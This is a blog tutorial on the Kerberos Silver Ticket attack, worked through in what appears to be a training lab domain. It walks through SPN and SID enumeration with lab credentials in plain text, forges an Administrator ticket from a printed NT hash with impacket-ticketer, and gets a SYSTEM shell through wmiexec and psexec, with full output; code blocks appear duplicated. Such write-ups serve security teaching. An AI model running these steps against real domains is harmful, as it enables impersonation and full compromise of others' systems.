June 15, 2026
Active Directory Attacks — Silver Ticket Attack
A Silver Ticket attack is a Kerberos abuse technique where an attacker forges a valid service ticket (TGS) to authenticate directly to a…
Osec
4 min read
A Silver Ticket attack is a Kerberos abuse technique where an attacker forges a valid service ticket (TGS) to authenticate directly to a specific service without contacting the Domain Controller (KDC).
What the attacker is taking advantage of
The attack exploits two key properties of Kerberos authentication:
1 - Service tickets (TGS) are validated locally
- When a client presents a TGS to a service (e.g., SMB, HTTP), the service does not contact the Domain Controller.
- It simply verifies the ticket using its own secret (password/NTLM hash).
2 - Services trust tickets signed with their own key
- If an attacker knows the service account's NTLM hash, they can forge tickets that appear legitimate.
Enumeration
Silver Ticket enumeration is the process of identifying Kerberos services and their associated accounts in order to obtain the necessary material (hash + SPN + SID) to forge a service ticket.
Linux
enumerate SPNs
impacket-GetUserSPNs :
impacket-GetUserSPNs -dc-ip 10.129.202.146 INLANEFREIGHT.LOCAL/htb-student_adm:'Academy_student_DA!'impacket-GetUserSPNs -dc-ip 10.129.202.146 INLANEFREIGHT.LOCAL/htb-student_adm:'Academy_student_DA!'or ldapsearch :
ldapsearch -x -H ldap://10.129.202.146 \
-D "htb-student_adm@INLANEFREIGHT.LOCAL" -w 'Academy_student_DA!' \
-b "DC=INLANEFREIGHT,DC=LOCAL" \
"(servicePrincipalName=*)" servicePrincipalName sAMAccountNameldapsearch -x -H ldap://10.129.202.146 \
-D "htb-student_adm@INLANEFREIGHT.LOCAL" -w 'Academy_student_DA!' \
-b "DC=INLANEFREIGHT,DC=LOCAL" \
"(servicePrincipalName=*)" servicePrincipalName sAMAccountNameenumerate SID
impacket-lookupsid INLANEFREIGHT.LOCAL/Administrator@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL -k -no-pass
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] StringBinding ncacn_np:ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114impacket-lookupsid INLANEFREIGHT.LOCAL/Administrator@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL -k -no-pass
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] StringBinding ncacn_np:ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114Windows
enumerate SPNs
setspn.exe -Q */*setspn.exe -Q */*enumerate SID
PS C:\Users\htb-student_adm> whoami /user
USER INFORMATION
----------------
User Name SID
============================= ==============================================
inlanefreight\htb-student_adm S-1-5-21-3842939050-3880317879-2865463114-5603PS C:\Users\htb-student_adm> whoami /user
USER INFORMATION
----------------
User Name SID
============================= ==============================================
inlanefreight\htb-student_adm S-1-5-21-3842939050-3880317879-2865463114-5603Examples:
linux :
ldapsearch -x -H ldap://10.129.202.146 -D "htb-student_adm@INLANEFREIGHT.LOCAL" -w 'Academy_student_DA!' -b "DC=INLANEFREIGHT,DC=LOCAL" "(servicePrincipalName=*)" servicePrincipalName sAMAccountName
# extended LDIF
#
# LDAPv3
# base <DC=INLANEFREIGHT,DC=LOCAL> with scope subtree
# filter: (servicePrincipalName=*)
# requesting: servicePrincipalName sAMAccountName
#
# ACADEMY-EA-DC01, Domain Controllers, INLANEFREIGHT.LOCAL
dn: CN=ACADEMY-EA-DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
sAMAccountName: ACADEMY-EA-DC01$
servicePrincipalName: exchangeAB/ACADEMY-EA-DC01
servicePrincipalName: exchangeAB/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: TERMSRV/ACADEMY-EA-DC01
servicePrincipalName: TERMSRV/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ACADEMY-EA-DC0
1.INLANEFREIGHT.LOCAL
servicePrincipalName: ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.
INLANEFREIGHT.LOCAL
servicePrincipalName: ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.
INLANEFREIGHT.LOCAL
servicePrincipalName: DNS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: GC/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOC
AL
servicePrincipalName: RestrictedKrbHost/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: RestrictedKrbHost/ACADEMY-EA-DC01
servicePrincipalName: RPC/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFR
EIGHT.LOCAL
servicePrincipalName: HOST/ACADEMY-EA-DC01/INLANEFREIGHT
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
servicePrincipalName: HOST/ACADEMY-EA-DC01
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.L
OCAL
...ldapsearch -x -H ldap://10.129.202.146 -D "htb-student_adm@INLANEFREIGHT.LOCAL" -w 'Academy_student_DA!' -b "DC=INLANEFREIGHT,DC=LOCAL" "(servicePrincipalName=*)" servicePrincipalName sAMAccountName
# extended LDIF
#
# LDAPv3
# base <DC=INLANEFREIGHT,DC=LOCAL> with scope subtree
# filter: (servicePrincipalName=*)
# requesting: servicePrincipalName sAMAccountName
#
# ACADEMY-EA-DC01, Domain Controllers, INLANEFREIGHT.LOCAL
dn: CN=ACADEMY-EA-DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
sAMAccountName: ACADEMY-EA-DC01$
servicePrincipalName: exchangeAB/ACADEMY-EA-DC01
servicePrincipalName: exchangeAB/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: TERMSRV/ACADEMY-EA-DC01
servicePrincipalName: TERMSRV/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ACADEMY-EA-DC0
1.INLANEFREIGHT.LOCAL
servicePrincipalName: ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.
INLANEFREIGHT.LOCAL
servicePrincipalName: ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.
INLANEFREIGHT.LOCAL
servicePrincipalName: DNS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: GC/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOC
AL
servicePrincipalName: RestrictedKrbHost/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: RestrictedKrbHost/ACADEMY-EA-DC01
servicePrincipalName: RPC/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFR
EIGHT.LOCAL
servicePrincipalName: HOST/ACADEMY-EA-DC01/INLANEFREIGHT
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
servicePrincipalName: HOST/ACADEMY-EA-DC01
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
servicePrincipalName: HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.L
OCAL
...windows :
PS C:\Users\htb-student_adm> setspn.exe -Q */*
Checking domain DC=INLANEFREIGHT,DC=LOCAL
CN=ACADEMY-EA-DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
exchangeAB/ACADEMY-EA-DC01
exchangeAB/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
TERMSRV/ACADEMY-EA-DC01
TERMSRV/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.INLANEFREIGHT.LOCAL
DNS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
GC/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-DC01
RPC/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFREIGHT.LOCAL
HOST/ACADEMY-EA-DC01/INLANEFREIGHT
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
HOST/ACADEMY-EA-DC01
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
E3514235-4B06-11D1-AB04-00C04FC2DCD2/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8/INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01/INLANEFREIGHT
ldap/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
ldap/ACADEMY-EA-DC01
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
kadmin/changepw
CN=ACADEMY-EA-MS01,OU=Web Servers,OU=Servers,OU=Computers,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
WSMAN/ACADEMY-EA-MS01
WSMAN/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
TERMSRV/ACADEMY-EA-MS01
TERMSRV/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
tapinego/ACADEMY-EA-MS01
tapinego/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-MS01
HOST/ACADEMY-EA-MS01
...PS C:\Users\htb-student_adm> setspn.exe -Q */*
Checking domain DC=INLANEFREIGHT,DC=LOCAL
CN=ACADEMY-EA-DC01,OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
exchangeAB/ACADEMY-EA-DC01
exchangeAB/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
TERMSRV/ACADEMY-EA-DC01
TERMSRV/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/ForestDnsZones.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DomainDnsZones.INLANEFREIGHT.LOCAL
DNS/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
GC/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-DC01
RPC/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFREIGHT.LOCAL
HOST/ACADEMY-EA-DC01/INLANEFREIGHT
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
HOST/ACADEMY-EA-DC01
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
E3514235-4B06-11D1-AB04-00C04FC2DCD2/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8/INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01/INLANEFREIGHT
ldap/dfca7c4d-e949-4ef8-bb02-8cd0fe2e13f8._msdcs.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT
ldap/ACADEMY-EA-DC01
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
ldap/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL
CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
kadmin/changepw
CN=ACADEMY-EA-MS01,OU=Web Servers,OU=Servers,OU=Computers,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
WSMAN/ACADEMY-EA-MS01
WSMAN/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
TERMSRV/ACADEMY-EA-MS01
TERMSRV/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
tapinego/ACADEMY-EA-MS01
tapinego/ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/ACADEMY-EA-MS01
HOST/ACADEMY-EA-MS01
...Attack
In a Silver Ticket attack, an attacker obtains the NTLM hash of a service account and uses it to forge a valid Kerberos service ticket (TGS) for a specific service, embedding any user identity and privileges they choose; they then present this forged ticket directly to the target service, which validates it locally using its own key and grants access — allowing the attacker to impersonate users without ever interacting with the Domain Controller.
Here's a concise checklist of prerequisites for a Silver Ticket attack:
- Access to a service account hash (NTLM hash of a machine or service account, e.g.,
WEB01$) - Target SPN (the service you want to attack, e.g.,
cifs/web01.domain.local) - Domain name (e.g.,
INLANEFREIGHT.LOCAL) - Domain SID (e.g.,
S-1-5-21-XXXX-XXXX-XXXX) - Knowledge of the username to impersonate (e.g.,
Administrator) - Kerberos-aware tool to forge tickets (e.g.,
impacket-ticketer,Mimikatz) - Network connectivity to the target service (SMB, WMI, HTTP, etc.)
These are all that's needed**, no interaction with the Domain Controller is required**.
demo time ;)
we did our enumeration and found out that the computer account ACADEMY-EA-DC01 has some SPNs associated to it, including this one : HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT.LOCAL.
we also have the NT Hash of that computer account 855ced84aa01080cee4fdbc755a08449 .
so let's try to forge a ticket impersonating the Administrator user on the target service.
impacket-ticketer -nthash 855ced84aa01080cee4fdbc755a08449 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain INLANEFREIGHT.LOCAL -spn HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT Administrator
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for INLANEFREIGHT.LOCAL/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccacheimpacket-ticketer -nthash 855ced84aa01080cee4fdbc755a08449 -domain-sid S-1-5-21-3842939050-3880317879-2865463114 -domain INLANEFREIGHT.LOCAL -spn HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/INLANEFREIGHT Administrator
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for INLANEFREIGHT.LOCAL/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccachewe've successfully created the ticket for the Administrator user, and we saved it at /tmp/Administrator.ccache.
now let's inject it into the current session ( pass-the-ticket )
export KRB5CCNAME=/tmp/Administrator.ccacheexport KRB5CCNAME=/tmp/Administrator.ccacheverify:
klist
Ticket cache: FILE:/tmp/Administrator.ccache
Default principal: Administrator@INLANEFREIGHT.LOCAL
Valid starting Expires Service principal
04/04/2026 16:00:47 04/01/2036 16:00:47 HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL
renew until 04/01/2036 16:00:47klist
Ticket cache: FILE:/tmp/Administrator.ccache
Default principal: Administrator@INLANEFREIGHT.LOCAL
Valid starting Expires Service principal
04/04/2026 16:00:47 04/01/2036 16:00:47 HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL
renew until 04/01/2036 16:00:47we have a TGS for HOST/ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL@INLANEFREIGHT.LOCAL Service principal for the user Administrator@INLANEFREIGHT.LOCAL.
don't forgot to match the system clock with DC, to avoid time related kerberos issues !
to match the system clock with the DC :
sudo ntpdate -u 10.129.202.146sudo ntpdate -u 10.129.202.146let's use that forged ticket
wmiexec :
impacket-wmiexec -k -no-pass INLANEFREIGHT.LOCAL/Administrator@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight.local\administratorimpacket-wmiexec -k -no-pass INLANEFREIGHT.LOCAL/Administrator@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight.local\administratorpsexec :
impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/Administrator@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file ZNVUwYKU.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service hZWK on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service hZWK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemimpacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/Administrator@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file ZNVUwYKU.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service hZWK on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service hZWK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemThanks for reading, i hope you've learned something new !
Make sure you subscribe so you get notified anytime a new article got droped !
Follow me on X : https://x.com/osec403